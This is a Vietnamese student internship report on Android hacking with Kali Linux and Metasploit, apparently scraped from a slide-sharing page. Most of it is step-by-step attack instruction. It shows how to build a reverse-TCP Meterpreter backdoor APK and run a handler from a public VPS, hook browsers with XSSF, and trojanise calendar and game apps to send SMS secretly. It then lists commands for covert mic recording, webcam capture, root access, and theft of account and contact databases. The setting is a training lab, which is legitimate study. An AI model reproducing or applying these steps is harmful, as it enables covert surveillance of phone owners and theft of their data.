Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Report athena week 1
Report athena week 1Report athena week 1
Report athena week 1
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Kali
KaliKali
Kali
 
Đề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdfĐề Tài Thực Hành CCNA Lab - CSMars.pdf
Đề Tài Thực Hành CCNA Lab - CSMars.pdf
 
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại runTruy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
Truy cập nhanh ứng dụng trong windows bằng lệnh trong hộp thoại run
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdf
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
Linux LPI Bacis
Linux LPI BacisLinux LPI Bacis
Linux LPI Bacis
 
Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1Bao cao thuc tap tuan 1
Bao cao thuc tap tuan 1
 
Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server
 
bai thuc hanh mang vien thong
bai thuc hanh mang vien thongbai thuc hanh mang vien thong
bai thuc hanh mang vien thong
 
Báo cáo thực tập Tuần 1
Báo cáo thực tập Tuần 1Báo cáo thực tập Tuần 1
Báo cáo thực tập Tuần 1
 
Linux Introduction
Linux IntroductionLinux Introduction
Linux Introduction
 
Tiểu Luận Tìm Hiểu NS2 Và Demo
Tiểu Luận Tìm Hiểu NS2 Và Demo Tiểu Luận Tìm Hiểu NS2 Và Demo
Tiểu Luận Tìm Hiểu NS2 Và Demo
 

Baocaocuoiki

  • 1. Báo cáo đề tài thực tập 1 NHẬN XÉT (Của giáo viên hướng dẫn) ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... ........................................................................................................................................... .......................... , ngày …… tháng …… năm .......... Giáo viên hướng dẫn
  • 2. Báo cáo đề tài thực tập 2 LỜI CẢM ƠN Trước tiên , em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên – TP Hồ Chí Minh và khoa Điện Tử Viễn Thông đã giảng dạy và truyền đạt cho em những kiến thức nền tảng , cần thiết trong suốt quá trình học tập vừa qua . Em cũng xin cảm ơn và biết ơn sâu sắc đến thầy Võ Đỗ Thắng , các thầy và anh chị trong trung tâm đào tạo quản trị và an ninh mạng quốc tế ATHENA đã tạo điều kiện cho em được thực tập trong mùa hè vừa qua , cũng đã giúp đỡ và hỗ trợ rất nhiều trong quá trình hoàn thành đề tài . Mặc dù đã nỗ lực hết khả năng của bản thân nhưng với lần đầu tiên trải nghiệm thực tế với kỳ thực tập nên chắc chắn sẽ có những thiếu sót trong quá trình hoàn thành báo cáo , mong nhận được sự thông cảm và ý kiến đóng góp tận tình để em có thể bổ sung những thiếu sót của bản thân . Một lần nữa em xin chân thành cảm ơn. Hồ Chí Minh , ngày 10 tháng 11 năm 2014 Sinh Viên thực tập Nguyễn Quốc Vương
  • 3. Báo cáo đề tài thực tập 3 Ảnh chụp cùng GV. Võ Đỗ Thắng. Ảnh chụp cùng GV.Trần Lâm Mẫn .
  • 4. Báo cáo đề tài thực tập 4 I/LÀM TRÊN MẠNG LAN (CÓ WIFI) 1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE Sơ lược về hệ điều hành Kali Linux: - Kali Linux là một hệ điều hành được xây dựng trên nhân Linux , được thiết kế để kiểm tra bảo mật , thử nghiệm xâm nhập các hệ thống máy tính .Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển , tháng 3 năm 2013 , hãng Offensive Security đã công bố phiên bản mới của BackTrack có thêm gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp .Nói về ưu điểm của Kali Linux là nói về nhưng thay đổi giữa BackTrack và Kali . So với BackTrack thì Kali có rất nhiều cải tiến : - Kali phát triển trên nền tảng hệ điều hành Debian Giao diện của phần mềm Vmwave + Tính tương thích kiến trúc + Hỗ trợ mạng không dây tốt hơn + Khả năng tùy biến cao + Dễ dàng nâng cấp các phiên bản Kali trong tương lai Cách cài đặt hệ điều hành Kali Linux trên Vmware - Giao diện của phần mềm VMware
  • 5. Báo cáo đề tài thực tập 5 - Chọn Edit -> Vitual Network Editor…. -> AddNetwork -> OK - Chọn mục Bridge -> Bridge to . Ở đây chúng ta chọn card mạng thật (wifi hoặc LAN)-> OK.
  • 6. Báo cáo đề tài thực tập - Về lại giao diện ban đầu của Vmware chọn Create a New Virtual Machine . Trên cửa sổ 6 mới chọn Custom -> Next.
  • 7. Báo cáo đề tài thực tập 7 - Next - I will install operating system later . - > Next.
  • 8. Báo cáo đề tài thực tập 8 - Chọn Linux .. lựa chọn version (Debian 64-bit) - ở phần location chúng ta chọn vị trí để lưu . Next
  • 9. Báo cáo đề tài thực tập 9 - Next - Chọn dung lượng bộ nhớ RAM
  • 10. Báo cáo đề tài thực tập 10 - Use bridged networking-> Next. - LSI Logic(Recommended)-> Next.
  • 11. Báo cáo đề tài thực tập 11
  • 12. Báo cáo đề tài thực tập 12
  • 13. Báo cáo đề tài thực tập 13
  • 14. Báo cáo đề tài thực tập - Sau khi Finish -> Edit Virtual Machine . Ở phần CD/DVD ta chọn đường dẫn tới file ISO 14 đã download trước ->OK.
  • 15. Báo cáo đề tài thực tập 15 - Đặt tên cho hệ thống
  • 16. Báo cáo đề tài thực tập 16 - Đặt password để đăng nhập vào kali
  • 17. Báo cáo đề tài thực tập 17
  • 18. Báo cáo đề tài thực tập 18
  • 19. Báo cáo đề tài thực tập 19 -Tiếnhànhcàiđặt
  • 20. Báo cáo đề tài thực tập 20 - Hoàn tất việc cài đặt
  • 21. Báo cáo đề tài thực tập 21 - Đăng nhập với Username là : root và password đã chọn.
  • 22. Báo cáo đề tài thực tập 22 - Giao diện của hệ điều hành Kali Linux đã được khởi động
  • 23. Báo cáo đề tài thực tập 23 2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX - Đầu tiên , kiểm tra địa chỉ IP bằng : ifconfig Địa chỉ IP : 192.168.1.14 - Khởi động terminal và gõ dòng lệnh sau: Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R > /root/Desktop/test.apk
  • 24. Báo cáo đề tài thực tập - Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã 24 tạo thành công
  • 25. Báo cáo đề tài thực tập 25 - Tiếp theo gõ lệnh : msfconsole
  • 26. Báo cáo đề tài thực tập - Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ 26 lệnh sau: Use exploit/multi/handler Set payload/meterpreter/reverse_tcp Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu Set lport 8080 – nhập port giống với khi tạo payload ở trên Exploit - Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor. - Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :
  • 27. Báo cáo đề tài thực tập - Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console 27 xuất hiện :
  • 28. Báo cáo đề tài thực tập 28 - Ta có thể gõ lệnh help để biết được các lệnh :
  • 29. Báo cáo đề tài thực tập 29 - Có một số lệnh cơ bản như  Để xem thông tin máy : sysinfo  Để sử dụng camera: webcam_list (xem danh sách camera) Webcam_snap x (sử dụng camera của android)  Để ghi âm : record_mic  Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file) cd/sdcard/download (để tải về máy )
  • 30. Báo cáo đề tài thực tập 3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC 30 - Đầu tiên , khởi động Kali Linux -> khởi mở Terminal - Lần lượt thực hiện 3 lệnh để cập nhật Framework msfupdate cd /opt/metasploit/apps/pro/msf3 svn export http://xssf.googlecode.com/svn/trunk/ ./ --force - Thực hiện lệnh “msfconsole” để khởi động Metasploit
  • 31. Báo cáo đề tài thực tập - Tiếp tục gõ lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” để 31 thực hiện XSSF. - Thực hiện lệnh “xssf_urls” để nhận được các đường dẫn web như của XSSF Server , XSSF test page , XSSF logs page …. Sau đó 1 máy nạn nhân bất kì truy cập vào đường dẫn web XSSF test page :
  • 32. Báo cáo đề tài thực tập 32 - Ta được kết quả như hình . Đồng thời máy tấn công cũng nhận được thông báo : New victim registered with id : 1 - Để kiểm tra số lượng nạn nhân truy cập vào đường dẫn ta dùng lệnh “xssf_victims” lúc này sẽ xuất hiện lượng máy nạn nhân truy cập phải
  • 33. Báo cáo đề tài thực tập 33
  • 34. Báo cáo đề tài thực tập - Bây giờ máy tấn công có thể xem thông tin và thực hiện khai thác dữ liệu về nạn 34 nhân bằng cách sử dụng lệnh :  Để kiểm tra thông tin về nạn nhân : xssf_information <ID máy nạn nhân>  Để kiểm tra các quyền Search auxiliary/xssf  Gửi thông báo xssf đến máy nạn nhân Use auxililary/xssf/public/misc/alert Run
  • 35. Báo cáo đề tài thực tập 4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ iMATCH 35 Tải về và xem source code của các ứng dụng *.apk: - Dùng phần mềm Dex2Jar để chuyển đổi file *.dex thành file *.jar - Tiếp theo xem source code của ứng dụng *.apk bằng phần mềm Jd-gui - Sau khi tải ứng dụng định dạng *.apk về. Ta giải nén bằng phần mềm WinRAR. Sau đó copy file classes.dex của ứng dụng vào thư mục chứa phần mềm Dex2Jar - Mở command trong Window lên. Di chuyển đến thư mục phần mềm Dex2Jar bằng lệnh cd - Chuyển đổi file bằng lệnh “dex2jar <tên file>” - Dùng Jd-gui mở file classes_dex2jar.jar vừa được tạo để xem source code của ứng dụng
  • 36. Báo cáo đề tài thực tập 36 - Lưu ý là chúng ta chỉ có thể xem nhưng không chỉnh sửa được. Cài đặt Trojan ứng dụng iCalendar.apk:  Thực hiện cài đặt Trojan ứng dụng iCalendar vào máy ảo Android 5554, sau đó tự động gửi tin nhắn đến máy ảo Android 5556. Ứng dụng iMatch cho phép gửi đi 1 tin nhắn. - Khởi động 2 máy ảo Android trên Eclipse - Khởi động phần mềm Super Apktool v2.1. Phần mềm sẽ quét và nhận diện các máy ảo Android đang chạy.
  • 37. Báo cáo đề tài thực tập 37 Ở ô Device > Ta chọn máy mà ta muốn cài đặt trojan iCalendar.apk - Project > New Project - Chọn file iCalendar.apk > Chờ phần mềm giải nén xong
  • 38. Báo cáo đề tài thực tập - View > View Smali Code: Cho phép chỉnh sửa code của ứng dụng iCalendar.apk 38
  • 39. Báo cáo đề tài thực tập 39 - Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali - File iCalendar.smali, sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin nhắn) và line 253 (là nội dung tin nhắn)
  • 40. Báo cáo đề tài thực tập - File SmsReceiver.smali, ta sửa code ở line 41 thành số điện thoại mà máy mình 40 muốn gửi đến, giống như ở iCalendar.smali - Sau khi sửa code, ta phải Save lại 2 file trên. - Run > Build : cho phép bắt đầu quá trình cài đặt trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android khác.
  • 41. Báo cáo đề tài thực tập - Kết quả ta nhận được ở máy Android có số điện thoại 5554 (bị cài đặt trojan 41 iCalendar.apk) - Giả sử nạn nhân trên click vào xem ứng dụng iCalendar này vài lần. Kết quả nhận được ở máy Android có số điện thoại 5556 (bị gửi tin nhắn tự động)
  • 42. Báo cáo đề tài thực tập 42 Cài đặt Trojan ứng dụng iMatch:  Thực hiện cài đặt Trojan ứng dụng iMatch vào máy ảo Android 5558, sau đó tự động gửi tin nhắn đến 2 máy ảo Android 5556 và Android 5554. Ứng dụng iMatch cho phép gửi cùng lúc 4 tin nhắn. - Khởi động 3 máy ảo > Tạo project mới > Trỏ đến file iMatch.apk > Đợi ứng dụng được giải nén > View > View Smali Code (tương tự như thao tác với iCalendar.apk) - Sửa code của file MJUtils.smali
  • 43. Báo cáo đề tài thực tập - Chỉnh sửa số điện thoại ở các line 57, line 66, line 75, line 84; chỉnh sửa nội dung 43 tin nhắn ở các line 58, line 67, line 76, line 85.
  • 44. Báo cáo đề tài thực tập 44 - Run > Build : cho phép bắt đầu quá trình cài đặt trojan iMatch.apk và gửi tin nhắn tự động. - Kết quả ta nhận được ở máy Android có số điện thoại 5558 (bị cài đặt trojan iMatch.apk)
  • 45. Báo cáo đề tài thực tập - Kết quả nhận được ở máy Android 5556 và Android 5554 (bị gửi tin nhắn tự động) 45
  • 46. Báo cáo đề tài thực tập II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ INTERNET) 46 1. Giới thiệu máy chủ ảo VPS: - Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. - Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. - Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng
  • 47. Báo cáo đề tài thực tập đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. - VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,… 47 2. Đặc điểm của VPS: - Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. - Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. - Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… - Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. - Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 3. Giá trị khi sử dụng VPS: - Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. - Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. - Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. - Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. - Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
  • 48. Báo cáo đề tài thực tập 48 4. Kết nối VPS: - Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta cần sử dụng ứng dụng Remote Desktop Connection. - Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs > Accessories > Remote Desktop Connection - Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta đăng ký tài khoản VPS. - Như vậy là ta đã có thể kết nối với máy chủ ảo VPS. CÀI ĐẶT METASPLOIT TRÊN VPS  Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành tải và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại Android 1. Giới thiệu về phần mềm Metasploit: - Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, tấn công và khai thác lỗi của các service. - Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, Assembler, và Python. - Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 2. Giới thiệu payload Meterpreter: - Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong Metasploit framework. - Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng các máy remote computers. Nó được viết từ các developers dưới dạng shared object( DLL) files.
  • 49. Báo cáo đề tài thực tập - Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus. - Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload 49 Meterpreter này. 3. Cài đặt Metasploit: Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng bản Community. Bước 2: Tiến hành đăng ký để tải Metasploit
  • 50. Báo cáo đề tài thực tập Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng ký. Bước 3: Cài đặt phần mềm qua file đã tải về 50 - Chọn thư mục cài đặt - Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 - Chọn server và ngày hết hạn, để mặc định. - Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn - Nhấp Finish và truy cập đến giao diện web của chương trình Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link https://localhost:3790/ Tạo một tài khoản sử dụng:
  • 51. Báo cáo đề tài thực tập 51 Nhập Key đã nhận từ email: Chọn ACTIVATE LICENSE Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit > Metasploit Console TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 1. Tạo ứng dụng chứa mã độc trên Kali Linux: Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
  • 52. Báo cáo đề tài thực tập Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal. Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: “msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk 52 2. Tấn công điện thoại Android: Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút. Bước 2: Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “ run ” Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên. Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau: Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
  • 53. Báo cáo đề tài thực tập 53 3. Các phương thức tấn công được sử dụng: Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 3.1 Ghi âm lén: Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 3.2 Sử dụng camera: Xem danh sách webcam của thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap <mã camera>” 3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: Di chuyển vào thư mục bằng lệnh: cd Tải về bằng lệnh: download <tên file> Xóa tập tin bằng lệnh: rm <tên file>
  • 54. Báo cáo đề tài thực tập 54 3.4 Truy cập trực tiếp vào hệ thống: Truy cập vào hệ thống bằng lệnh: “shell” > “su” Kiểm tra máy đã root hay chưa bằng lệnh: “whoami” Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công. 3.5 Truy cập và khai thác tài khoản người dùng: Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
  • 55. Báo cáo đề tài thực tập 55 Trở về meterpreter và tải file accounts.db về: Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
  • 56. Báo cáo đề tài thực tập 56 3.6 Truy cập và đánh cắp danh bạ điện thoại: Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy
  • 57. Báo cáo đề tài thực tập 57 Xem nội dung của contacts2.db bằng SQLite Manager
  • 58. Báo cáo đề tài thực tập 58 3.7 Một số câu lệnh khác: - Để biết thêm về các lệnh có thể thực hiện ta dùng help - Để xem thông tin về máy, nhập lệnh sysinfo - Để xem các tác vụ đang chạy gõ ps - Xem ip của máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls - Để upload gõ lệnh upload - ls -l danh mục file và các quyền - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM
  • 59. Báo cáo đề tài thực tập 59 /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data - Ctrl + C để quay lại
  • 60. Báo cáo đề tài thực tập 60 Contents NHẬN XÉT.................................................................................................................................... 1 LỜI CẢM ƠN ................................................................................................................................ 2 I/LÀM TRÊN MẠNG LAN (CÓ WIFI) ..................................................................................... 4 1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE............................................................... 4 2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX ........................................ 23 3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC ... 30 4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ iMATCH ................................................................................................................................................... 35 II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ INTERNET) ........................................ 46 1. Giới thiệu máy chủ ảo VPS: ....................................................................................... 46 2. Đặc điểm của VPS: ..................................................................................................... 47 3. Giá trị khi sử dụng VPS: ............................................................................................. 47 4. Kết nối VPS: ............................................................................................................... 48 CÀI ĐẶT METASPLOIT TRÊN VPS .............................................................................. 48 1. Giới thiệu về phần mềm Metasploit: .......................................................................... 48 2. Giới thiệu payload Meterpreter: ................................................................................. 48 3. Cài đặt Metasploit:...................................................................................................... 49 TẤN CÔNG MÁY ANDROID TỪ MÁY VPS ................................................................ 51 1. Tạo ứng dụng chứa mã độc trên Kali Linux: .............................................................. 51 2. Tấn công điện thoại Android: ..................................................................................... 52 3. Các phương thức tấn công được sử dụng: .................................................................. 53
  • 61. Báo cáo đề tài thực tập 61